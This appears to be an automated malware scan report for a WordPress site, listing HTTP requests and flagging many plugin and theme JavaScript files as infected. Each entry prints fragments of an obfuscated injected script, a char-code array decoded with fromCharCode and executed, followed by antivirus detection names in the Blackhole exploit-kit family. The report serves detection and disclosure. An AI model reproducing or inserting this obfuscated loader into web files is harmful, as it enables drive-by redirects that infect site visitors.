Request | Server response | Status |
http://www.usharif3.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 05 Oct 2014 05:11:28 GMT Location: http://usharif3.com/main/ Server: Apache Content-Length: 0 Content-Type: text/html
| clean |
http://usharif3.com/main/ | 200 OK Content-Length: 24427 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js?ver=3.4 | 200 OK Content-Length: 85925 Content-Type: text/javascript | clean |
http://usharif3.com/main/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3 | 200 OK Content-Length: 13233 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
shutterOnload = function(){shutterReloaded.init('sh');}
if (typeof shutterOnload == 'function') {
if ('undefined' != typeof jQuery) jQuery(document).ready(function(){shutterOnload();});
else if( typeof window.onload != 'function' ) window.onload = shutterOnload;
else {oldonld = window.onload;window.onload = function(){if(oldonld){oldonld();};shutterOnload();}};
}
shutterReloaded = {
I : function (a) {
return document.get
... 3271 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Decode-BCN [Trj]
- Ad-Aware
- Trojan.JS.Agent.IJB
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan ( 85a43f9d0 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1202
- Comodo
- TrojWare.JS.Agent.IR
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- CAT-QuickHeal
- JS\BlacoleRef.DD
- K7GW
- Exploit ( 04c553011 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.LR
- MicroWorld-eScan
- Trojan.JS.Agent.IJB
- Fortinet
- JS/Iframe.WOR!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- Trojan.JS.Agent.IJB
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- Norman
- Exploit.AIV
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 29560 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a){function r(b){function e(b){for(;b&&b.nodeName.toLowerCase()!="html";b=b.parentNode){var c=a.css(b,"background-color");if(c&&c.indexOf("rgb")>=0){var e=c.match(/\d+/g);return"#"+d(e[0])+d(e[1])+d(e[2])}if(c&&c!="transparent")return c}return"#ffffff"}function d(a){a=parseInt(a,10).toString(16);return a.length<2?"0"+a:a}c("applying clearType background-color hack");b.each(function(){a(this).css("background-color",e(this))})}function q(b,c){var d=a(c.pager
... 3159 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Decode-BCN [Trj]
- Ad-Aware
- Trojan.JS.Agent.IJB
- Bkav
- MW.Clod2b0.Trojan.9110
- Ikarus
- Virus.HTML.Framer
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan ( 85a43f9d0 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1202
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- Comodo
- TrojWare.JS.Agent.IR
- CAT-QuickHeal
- JS\BlacoleRef.DD
- K7GW
- Exploit ( 04c553011 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.LR
- Kaspersky
- Trojan.JS.Redirector.xb
- ViRobot
- JS.A.Redirector.29488.A
- MicroWorld-eScan
- Trojan.JS.Agent.IJB
- Fortinet
- JS/Iframe.WOR!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- Trojan.JS.Agent.IJB
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- Norman
- Exploit.AIV
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 4761 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.fn.nggSlideshow=function(args){var defaults={id:1,width:320,height:240,fx:'fade',domain:'',timeout:5000};var s=jQuery.extend({},defaults,args);var obj=this.selector;var stack=[];var url=s.domain+'index.php?callback=json&api_key=true&format=json&method=gallery&id='+s.id;var stackLength=0;jQuery.getJSON(url,function(r){if(r.stat=="ok"){for(img in r.images){var photo=r.images[img];stack.push(decodeURI(photo['imageURL']))}stackLength=stack.length;loadImage(1)}});function loadI
... 3747 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Decode-BCN [Trj]
- Ad-Aware
- Trojan.JS.Agent.IJB
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan ( 85a43f9d0 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1202
- Comodo
- TrojWare.JS.Agent.IR
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- CAT-QuickHeal
- JS\BlacoleRef.DD
- K7GW
- Exploit ( 04c553011 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.LR
- MicroWorld-eScan
- Trojan.JS.Agent.IJB
- Fortinet
- JS/Iframe.WOR!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- Trojan.JS.Agent.IJB
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- Norman
- Exploit.AIV
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-content/themes/blacklabel/js/swfobject.js | 200 OK Content-Length: 12729 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var b="undefined",Q="object",n="Shockwave Flash",p="ShockwaveFlash.ShockwaveFlash",P="application/x-shockwave-flash",m="SWFObjectExprInst",j=window,K=document,T=navigator,o=[],N=[],i=[],d=[],J,Z=null,M=null,l=null,e=false,A=false;var h=function(){var v=typeof K.getElementById!=b&&typeof K.getElementsByTagName!=b&&typeof K.createElement!=b,AC=[0,0,0],x=null;if(typeof T.plugins!=b&&typeof T.plugins[n]==Q){x=T.plugins[n].description;if(x&&!(t
... 3104 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Iframe-ZR [Trj]
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- Comodo
- TrojWare.JS.Agent.IR
- CAT-QuickHeal
- JS\BlacoleRef.DD
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.LR
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- Trojan.JS.Agent.IJB
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-content/themes/blacklabel/js/jquery.jplayer.min.js | 200 OK Content-Length: 36262 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(c,h){c.fn.jPlayer=function(a){var b=typeof a==="string",d=Array.prototype.slice.call(arguments,1),f=this;a=!b&&d.length?c.extend.apply(null,[true,a].concat(d)):a;if(b&&a.charAt(0)==="_")return f;b?this.each(function(){var e=c.data(this,"jPlayer"),g=e&&c.isFunction(e[a])?e[a].apply(e,d):e;if(g!==e&&g!==h){f=g;return false}}):this.each(function(){var e=c.data(this,"jPlayer");if(e){e.option(a||{})._init();e.option(a||{})}else c.data(this,"jPlayer",new c.jPl
... 3086 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Iframe-ZR [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- Comodo
- TrojWare.JS.Agent.IR
- CAT-QuickHeal
- JS\BlacoleRef.DD
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.LR
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- Trojan.JS.Agent.IJB
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.8.20 | 200 OK Content-Length: 7265 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function c(b,c){var e=b.nodeName.toLowerCase();if("area"===e){var f=b.parentNode,g=f.name,h;return!b.href||!g||f.nodeName.toLowerCase()!=="map"?!1:(h=a("img[usemap=#"+g+"]")[0],!!h&&d(h))}return(/input|select|textarea|button|object/.test(e)?!b.disabled:"a"==e?b.href||c:c)&&d(b)}function d(b){return!a(b).parents().andSelf().filter(function(){return a.curCSS(this,"visibility")==="hidden"||a.expr.filters.hidden(this)}).length}a.ui=a.ui||{};if(a.ui.version)return;a.ext
... 3068 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Decode-BCN [Trj]
- Ad-Aware
- Trojan.JS.Agent.IJB
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan ( 85a43f9d0 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1202
- Comodo
- TrojWare.JS.Agent.IR
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- CAT-QuickHeal
- JS\BlacoleRef.DD
- K7GW
- Exploit ( 04c553011 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.LR
- MicroWorld-eScan
- Trojan.JS.Agent.IJB
- Fortinet
- JS/Iframe.WOR!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- Trojan.JS.Agent.IJB
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- Norman
- Exploit.AIV
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-content/plugins/contact-form-7/includes/js/jquery.form.js?ver=3.09 | 200 OK Content-Length: 17208 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e){var c={};c.fileapi=e("<input type='file'/>").get(0).files!==undefined;c.formdata=window.FormData!==undefined;e.fn.ajaxSubmit=function(g){if(!this.length){d("ajaxSubmit: skipping submit process - no element selected");return this}var f,w,i,l=this;if(typeof g=="function"){g={success:g}}f=this.attr("method");w=this.attr("action");i=(typeof w==="string")?e.trim(w):"";i=i||window.location.href||"";if(i){i=(i.match(/^([^#]+)/)||[])[1]}g=e.extend(true,{url:i,success:e.ajaxSettings.su
... 3059 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Decode-BCN [Trj]
- Ad-Aware
- Trojan.JS.Agent.IJB
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan ( 85a43f9d0 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1202
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- Comodo
- TrojWare.JS.Agent.IR
- CAT-QuickHeal
- JS\BlacoleRef.DD
- K7GW
- Exploit ( 04c553011 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.LR
- MicroWorld-eScan
- Trojan.JS.Agent.IJB
- Fortinet
- JS/Iframe.WOR!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- Norman
- Exploit.AIV
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.2 | 200 OK Content-Length: 9600 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $(function() { try { if (typeof _wpcf7 == 'undefined' || _wpcf7 === null) _wpcf7 = {}; _wpcf7 = $.extend({ cached: 0 }, _wpcf7); $('div.wpcf7 > form').ajaxForm({ beforeSubmit: function(formData, jqForm, options) { jqForm.wpcf7ClearResponseOutput(); jqForm.find('img.ajax-loader').css({ visibility: 'visible' }); return true; }, beforeSerialize: function(jqForm, options) { jqForm.fi
... 3201 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Decode-BCN [Trj]
- Ad-Aware
- Trojan.JS.Agent.IJB
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan ( 85a43f9d0 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1202
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- Comodo
- TrojWare.JS.Agent.IR
- CAT-QuickHeal
- JS\BlacoleRef.DD
- K7GW
- Exploit ( 04c553011 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.LR
- Kaspersky
- Trojan.JS.Redirector.xb
- MicroWorld-eScan
- Trojan.JS.Agent.IJB
- Fortinet
- JS/Iframe.WOR!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- Trojan.JS.Agent.IJB
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- Norman
- Exploit.AIV
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-includes/js/comment-reply.js?ver=3.4 | 200 OK Content-Length: 3756 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form
... 2708 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Iframe-ZR [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- TROJ_GEN.F47V0325
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- Comodo
- TrojWare.JS.Agent.IR
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.LR
- Fortinet
- JS/Iframe.W!tr
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- Trojan.JS.Agent.IJB
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-content/themes/blacklabel/js/jqueryslidemenu.js | 200 OK Content-Length: 5637 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var arrowimages={down:['downarrowclass', 'down.gif', 23], right:['rightarrowclass', 'right.gif']}
var jqueryslidemenu={
animateduration: {over: 200, out: 100},
buildmenu:function(menuid, arrowsvar){
jQuery(document).ready(function($){
var $mainmenu=$("#"+menuid+">ul")
var $headers=$mainmenu.find("ul").parent()
$headers.each(function(i){
var $curobj=$(this)
var $subul=$(this).find('ul:eq(0)')
this.
... 3818 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- Comodo
- TrojWare.JS.Agent.IR
- CAT-QuickHeal
- JS\BlacoleRef.DD
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.LR
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-content/themes/blacklabel/js/cufon-yui.js | 200 OK Content-Length: 21228 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&
... 3047 bytes are skipped ...11,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}/*8178af9b0a2c066043b431d238c0190f*/Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Iframe-ZR [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- Comodo
- TrojWare.JS.Agent.IR
- CAT-QuickHeal
- JS\BlacoleRef.DD
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.LR
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Secure
- Trojan.JS.Agent.IJB
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-content/themes/blacklabel/js/fonts/PT_Sans_400-PT_Sans_700.font.js | 200 OK Content-Length: 140134 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":196,"face":{"font-family":"PT Sans","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 3 2 2 3 2 2 4","ascent":"270","descent":"-90","x-height":"4","bbox":"-13 -313 352 84.6092","underline-thickness":"18","underline-position":"-18","unicode-range":"U+0020-U+2122"},"glyphs":{" ":{"w":96,"k":{"-":29,"\u00ad":29,"\u2013":29,"\u2014":29,",":5,".":5,"\u2026":5,"T":11,"V":11,"W":7,"X":11,"Y":11,"\u00dd":11,"Z":8,"v":5,"y":5,"\u00fd":5,"\u00ff":5,"
... 3012 bytes are skipped ...11,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);}/*8178af9b0a2c066043b431d238c0190f*/Antivirus reports:- AntiVir
- JS/BlacoleRef.W.106
- Avast
- JS:Iframe-ZR [Trj]
- nProtect
- Trojan.JS.Agent.IJB
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.IJB (B)
- Comodo
- TrojWare.JS.Agent.IR
- CAT-QuickHeal
- JS\BlacoleRef.DD
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.LR
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bgvzbb
- F-Prot
- JS/IFrame.RS
- AVG
- HTML/Framer
- GData
- Trojan.JS.Agent.IJB
- Commtouch
- JS/IFrame.RS
- BitDefender
- Trojan.JS.Agent.IJB
|
http://usharif3.com/main/wp-content/themes/blacklabel/js/jquery.hoverIntent.minified.js | 200 OK Content-Length: 4579 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)  (function($){$.fn.hoverIntent=function(f,g){var cfg={sensitivity:7,interval:100,timeout:0};cfg=$.extend(cfg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interv
